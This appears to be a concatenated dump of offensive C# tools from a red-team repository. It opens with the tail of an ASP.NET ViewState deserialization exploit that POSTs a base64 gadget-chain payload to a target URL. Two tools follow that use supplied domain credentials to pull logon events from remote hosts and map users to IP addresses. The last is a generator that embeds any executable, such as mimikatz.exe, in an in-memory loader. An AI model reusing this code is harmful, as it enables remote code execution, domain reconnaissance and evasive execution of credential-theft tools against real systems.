ZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkJvb2xlYW4sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAGagAAAB5TeXN0ZW0uQ29sbGVjdGlvbnMuSUVudW1lcmF0b3IGawAAAAhNb3ZlTmV4dAoBSQAAAEMAAAAJawAAAAk+AAAACWoAAAAGbgAAABJCb29sZWFuIE1vdmVOZXh0KCkGbwAAABlTeXN0ZW0uQm9vbGVhbiBNb3ZlTmV4dCgpCAAAAAoBSgAAAEIAAAAGcAAAAL0CU3lzdGVtLkZ1bmNgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZyAAAAhAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GcwAAAAtnZXRfQ3VycmVudAoBSwAAAEMAAAAJcwAAAAk+AAAACXIAAAAGdgAAABlTeXN0ZW0uVHlwZSBnZXRfQ3VycmVudCgpBncAAAAZU3lzdGVtLlR5cGUgZ2V0X0N1cnJlbnQoKQgAAAAKAUwAAABCAAAABngAAADGAVN5c3RlbS5GdW5jYDJbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABnoAAAAQU3lzdGVtLkFjdGl2YXRvcgZ7AAAADkNyZWF0ZUluc3RhbmNlCgFNAAAAQwAAAAl7AAAACT4AAAAJegAAAAZ+AAAAKVN5c3RlbS5PYmplY3QgQ3JlYXRlSW5zdGFuY2UoU3lzdGVtLlR5cGUpBn8AAAApU3lzdGVtLk9iamVjdCBDcmVhdGVJbnN0YW5jZShTeXN0ZW0uVHlwZSkIAAAACgFOAAAADwAAAAaAAAAAJlN5c3RlbS5Db21wb25lbnRNb2RlbC5EZXNpZ24uQ29tbWFuZElEBAAAAAk6AAAAEE8AAAACAAAACYIAAAAICAAgAAAEggAAAAtTeXN0ZW0uR3VpZAsAAAACX2ECX2ICX2MCX2QCX2UCX2YCX2cCX2gCX2kCX2oCX2sAAAAAAAAAAAAAAAgHBwICAgICAgICExPSdO4q0RGL+wCgyQ8m9wsL"; 108 | 109 | byte[] payload2 = System.Convert.FromBase64String(xaml_payload2); 110 | string data2 = CreateViewState(payload2, generator, key); 111 | 112 | HttpWebRequest hwr = WebRequest.Create(targeturl) as HttpWebRequest; 113 | hwr.AllowAutoRedirect = false; 114 | hwr.Method = "POST"; 115 | hwr.UserAgent = "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36xxxxx"; 116 | hwr.ContentType = "application/x-www-form-urlencoded"; 117 | hwr.Headers.Add("Value", "00HGAT3K0AXHV2RF2W0G"); 118 | hwr.Proxy = null; 119 | byte[] post = Encoding.UTF8.GetBytes("__VIEWSTATE="+HttpUtility.UrlEncode(data2)+"&__VIEWSTATEGENERATOR="+generator); 120 | hwr.ContentLength = post.Length; 121 | hwr.GetRequestStream().Write(post,0,post.Length); 122 | HttpWebResponse res = hwr.GetResponse() as HttpWebResponse; 123 | Console.WriteLine(res.StatusCode); 124 | 125 | for(int i=0;i 21 | target: 22 | - localhost 23 | - domain\username:password@server 24 | query: 25 | - all 26 | - Event/System/TimeCreated/@SystemTime>='2022-01-01T00:00:00' 27 | 28 | Eg: 29 | SharpGetUserLoginIPRPC.exe localhost all 30 | SharpGetUserLoginIPRPC.exe test.com\administrator:password@123@192.168.1.1 ""Event/System/TimeCreated/@SystemTime >= '2022-01-26T02:30:39' and Event/System/TimeCreated/@SystemTime <= '2022-01-26T02:31:00'"" 31 | 32 | "; 33 | Console.WriteLine(Usage); 34 | } 35 | 36 | static void Main(String[] args) 37 | { 38 | if (args.Length != 2) 39 | { 40 | ShowUsage(); 41 | System.Environment.Exit(0); 42 | } 43 | try 44 | { 45 | EventLogSession session; 46 | String queryPath; 47 | if (args[0] == "localhost") 48 | { 49 | Console.WriteLine("[*] Try to query local eventlog"); 50 | session = new EventLogSession(); 51 | } 52 | else 53 | { 54 | Console.WriteLine(args[0]); 55 | int pos1 = args[0].IndexOf("\\"); 56 | String domain = args[0].Substring(0, pos1); 57 | int pos2 = args[0].IndexOf(":"); 58 | String username = args[0].Substring(pos1+1, pos2-pos1-1); 59 | int pos3 = args[0].LastIndexOf("@"); 60 | String password = args[0].Substring(pos2+1, pos3-pos2-1); 61 | String server = args[0].Substring(pos3+1); 62 | Console.WriteLine("[*] Try to query remote eventlog"); 63 | Console.WriteLine(" Domain : " + domain); 64 | Console.WriteLine(" Username : " + username); 65 | Console.WriteLine(" Password : " + password); 66 | Console.WriteLine(" Server : " + server); 67 | SecureString securePwd = new SecureString(); 68 | foreach (char c in password) 69 | { 70 | securePwd.AppendChar(c); 71 | } 72 | session = new EventLogSession(server, domain, username, securePwd, SessionAuthentication.Negotiate); 73 | } 74 | if (args[1] == "all") 75 | queryPath = "(Event/System/EventID=4624)"; 76 | else 77 | queryPath = "(Event/System/EventID=4624) and " + args[1]; 78 | Console.WriteLine("[*] Try to query: " + queryPath); 79 | EventLogQuery eventLogQuery = new EventLogQuery("Security", PathType.LogName, queryPath) 80 | { 81 | Session = session, 82 | TolerateQueryErrors = true, 83 | ReverseDirection = true 84 | }; 85 | int flagTotal = 0; 86 | int flagExist = 0; 87 | using (EventLogReader eventLogReader = new EventLogReader(eventLogQuery)) 88 | { 89 | eventLogReader.Seek(System.IO.SeekOrigin.Begin, 0); 90 | do 91 | { 92 | EventRecord eventData = eventLogReader.ReadEvent(); 93 | if (eventData == null) 94 | break; 95 | flagTotal++; 96 | XmlDocument xmldoc = new XmlDocument(); 97 | xmldoc.LoadXml(eventData.ToXml()); 98 | XmlNodeList recordid = xmldoc.GetElementsByTagName("EventRecordID"); 99 | XmlNodeList data = xmldoc.GetElementsByTagName("Data"); 100 | String targetUserSid = data[4].InnerText; 101 | String targetDomainName = data[6].InnerText; 102 | String targetUserName = data[5].InnerText; 103 | String ipAddress = data[18].InnerText; 104 | if (targetUserSid.Length > 9 && ipAddress.Length > 8) 105 | { 106 | Console.WriteLine("[+] EventRecordID: " + recordid[0].InnerText); 107 | Console.WriteLine(" TimeCreated : " + eventData.TimeCreated); 108 | Console.WriteLine(" UserSid: " + targetUserSid); 109 | Console.WriteLine(" DomainName: " + targetDomainName); 110 | Console.WriteLine(" UserName: " + targetUserName); 111 | Console.WriteLine(" IpAddress: " + ipAddress); 112 | flagExist++; 113 | } 114 | eventData.Dispose(); 115 | } while (true); 116 | Console.WriteLine("Total: " + flagTotal + ", Exist: " + flagExist); 117 | } 118 | } 119 | catch (Exception e) 120 | { 121 | Console.WriteLine("[!] ERROR: {0}", e); 122 | } 123 | } 124 | } 125 | } -------------------------------------------------------------------------------- /SharpGetUserLoginIPWMI.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Management; 3 | namespace SharpGetUserLoginIPWMI 4 | { 5 | class Program 6 | { 7 | static void ShowUsage() 8 | { 9 | String Usage = @" 10 | SharpGetUserLoginIPWMI 11 | Use WMI to get the login IP of domain users through the event log. 12 | Support local and remote access 13 | Complie: 14 | C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe SharpGetUserLoginIPWMI.cs 15 | or 16 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SharpGetUserLoginIPWMI.cs 17 | Usage: 18 | SharpGetUserLoginIPWMI 19 | target: 20 | - localhost 21 | - domain\username:password@server 22 | query: 23 | - all 24 | - TimeGenerated<=20210326 25 | 26 | Eg: 27 | SharpGetUserLoginIPRPC.exe localhost all 28 | SharpGetUserLoginIPRPC.exe test.com\administrator:password@123@192.168.1.1 ""TimeGenerated<=20210326"" 29 | 30 | "; 31 | Console.WriteLine(Usage); 32 | } 33 | 34 | static void Main(String[] args) 35 | { 36 | if (args.Length != 2) 37 | { 38 | ShowUsage(); 39 | System.Environment.Exit(0); 40 | } 41 | try 42 | { 43 | String queryPath; 44 | ManagementScope s; 45 | if (args[0] == "localhost") 46 | { 47 | Console.WriteLine("[*] Try to query local eventlog"); 48 | s = new ManagementScope("root\\CIMV2"); 49 | } 50 | else 51 | { 52 | Console.WriteLine(args[0]); 53 | int pos1 = args[0].IndexOf("\\"); 54 | String domain = args[0].Substring(0, pos1); 55 | int pos2 = args[0].IndexOf(":"); 56 | String username = args[0].Substring(pos1 + 1, pos2 - pos1 - 1); 57 | int pos3 = args[0].LastIndexOf("@"); 58 | String password = args[0].Substring(pos2 + 1, pos3 - pos2 - 1); 59 | String server = args[0].Substring(pos3 + 1); 60 | Console.WriteLine("[*] Try to query remote eventlog"); 61 | Console.WriteLine(" Domain : " + domain); 62 | Console.WriteLine(" Username : " + username); 63 | Console.WriteLine(" Password : " + password); 64 | Console.WriteLine(" Server : " + server); 65 | var opt = new ConnectionOptions(); ; 66 | opt.Username = domain + "\\" + username; 67 | opt.Password = password; 68 | s = new ManagementScope("\\\\" + server + "\\root\\CIMV2", opt); 69 | } 70 | if (args[1] == "all") 71 | queryPath = "SELECT * FROM Win32_NTLogEvent Where Logfile = 'Security'"; 72 | else 73 | queryPath = "SELECT * FROM Win32_NTLogEvent Where Logfile = 'Security' AND " + args[1]; 74 | Console.WriteLine("[*] Try to query: " + queryPath); 75 | SelectQuery q = new SelectQuery(queryPath); 76 | 77 | ManagementObjectSearcher mos = new ManagementObjectSearcher(s, q); 78 | int flagTotal = 0; 79 | int flagExist = 0; 80 | foreach (ManagementObject o in mos.Get()) 81 | { 82 | flagTotal++; 83 | String Message = o.GetPropertyValue("Message").ToString(); 84 | int pos1 = Message.LastIndexOf("Security ID"); 85 | int pos2 = Message.LastIndexOf("Account Name"); 86 | int pos3 = Message.LastIndexOf("Account Domain"); 87 | int pos4 = Message.LastIndexOf("Logon ID"); 88 | int pos5 = Message.LastIndexOf("Source Network Address"); 89 | int pos6 = Message.LastIndexOf("Source Port"); 90 | int length1 = pos2 - pos1 - 16; 91 | int length2 = pos4 - pos3 - 20; 92 | int length3 = pos3 - pos2 - 17; 93 | int length4 = pos6 - pos5 - 27; 94 | if (length1 < 0 || length2 < 0 || length3 < 0 || length4 < 0) 95 | continue; 96 | String targetUserSid = Message.Substring(pos1 + 14, length1); 97 | String targetDomainName = Message.Substring(pos3 + 17, length2); 98 | String targetUserName = Message.Substring(pos2 + 15, length3); 99 | String ipAddress = Message.Substring(pos5 + 24, length4); 100 | if (targetUserSid.Length > 9 && ipAddress.Length > 8) 101 | { 102 | Console.WriteLine("[+] EventRecordID: " + o.GetPropertyValue("RecordNumber")); 103 | Console.WriteLine(" TimeCreated : " + o.GetPropertyValue("TimeGenerated")); 104 | Console.WriteLine(" UserSid: " + targetUserSid); 105 | Console.WriteLine(" DomainName: " + targetDomainName); 106 | Console.WriteLine(" UserName: " + targetUserName); 107 | Console.WriteLine(" IpAddress: " + ipAddress); 108 | flagExist++; 109 | } 110 | } 111 | Console.WriteLine("Total: " + flagTotal + ", Exist: " + flagExist); 112 | 113 | } 114 | catch (Exception e) 115 | { 116 | Console.WriteLine("[!] ERROR: {0}", e); 117 | } 118 | } 119 | } 120 | } -------------------------------------------------------------------------------- /SharpPELoaderGenerater.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.IO; 3 | using System.IO.Compression; 4 | using System.Runtime.InteropServices; 5 | 6 | namespace GenerateSharpPELoader 7 | { 8 | class Program 9 | { 10 | static byte[] Compress(byte[] raw) 11 | { 12 | using (MemoryStream memory = new MemoryStream()) 13 | { 14 | using (GZipStream gzip = new GZipStream(memory, 15 | CompressionMode.Compress, true)) 16 | { 17 | gzip.Write(raw, 0, raw.Length); 18 | } 19 | return memory.ToArray(); 20 | } 21 | } 22 | 23 | static byte[] Decompress(byte[] gzip) 24 | { 25 | using (GZipStream stream = new GZipStream(new MemoryStream(gzip), CompressionMode.Decompress)) 26 | { 27 | const int size = 4096; 28 | byte[] buffer = new byte[size]; 29 | using (MemoryStream memory = new MemoryStream()) 30 | { 31 | int count = 0; 32 | do 33 | { 34 | count = stream.Read(buffer, 0, size); 35 | if (count > 0) 36 | { 37 | memory.Write(buffer, 0, count); 38 | } 39 | } 40 | while (count > 0); 41 | return memory.ToArray(); 42 | } 43 | } 44 | } 45 | static void Main(string[] args) 46 | { 47 | string Usage = @" 48 | SharpPELoaderGenerater 49 | Use to generate SharpPELoader.cs 50 | Modified by 3gstudent 51 | Reference:Casey Smith's PELoader.cs 52 | 53 | Usage: 54 | SharpPELoaderGenerater.exe 55 | Eg. 56 | SharpPELoaderGenerater.exe mimikatz.exe 57 | 58 | SharpPELoaderGenerater will determine whether the exe is 32-bit or 64-bit and then generate the corresponding code. 59 | "; 60 | if(args.Length !=1) 61 | { 62 | Console.WriteLine(Usage); 63 | Environment.Exit(0); 64 | } 65 | 66 | PELoader pe = new PELoader(args[0].ToString()); 67 | if (pe.Is32BitHeader) 68 | { 69 | Console.WriteLine("[+] 32 bit of PE"); 70 | Console.WriteLine("[*] Try to generate SharpPELoader_x86.cs"); 71 | string source1compress_x86 = @"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"; 72 | byte[] data1 = System.Convert.FromBase64String(source1compress_x86); 73 | byte[] decompressed1 = Decompress(data1); 74 | string source1_x86 = System.Text.Encoding.Default.GetString(decompressed1); 75 | 76 | byte[] AsBytes1 = File.ReadAllBytes(args[0].ToString()); 77 | byte[] compress1 = Compress(AsBytes1); 78 | string source2_x86 = Convert.ToBase64String(compress1); 79 | 80 | string source3_x86 = "\";\r\n }\r\n } "; 81 | StreamWriter sw1 = new StreamWriter(@"SharpPELoader_x86.cs"); 82 | sw1.Write(source1_x86 + source2_x86 + source3_x86); 83 | sw1.Close(); 84 | 85 | } 86 | else 87 | { 88 | Console.WriteLine("[+] 64 bit of PE"); 89 | Console.WriteLine("[*] Try to generate SharpPELoader_x64.cs"); 90 | string source1compress_x64 = 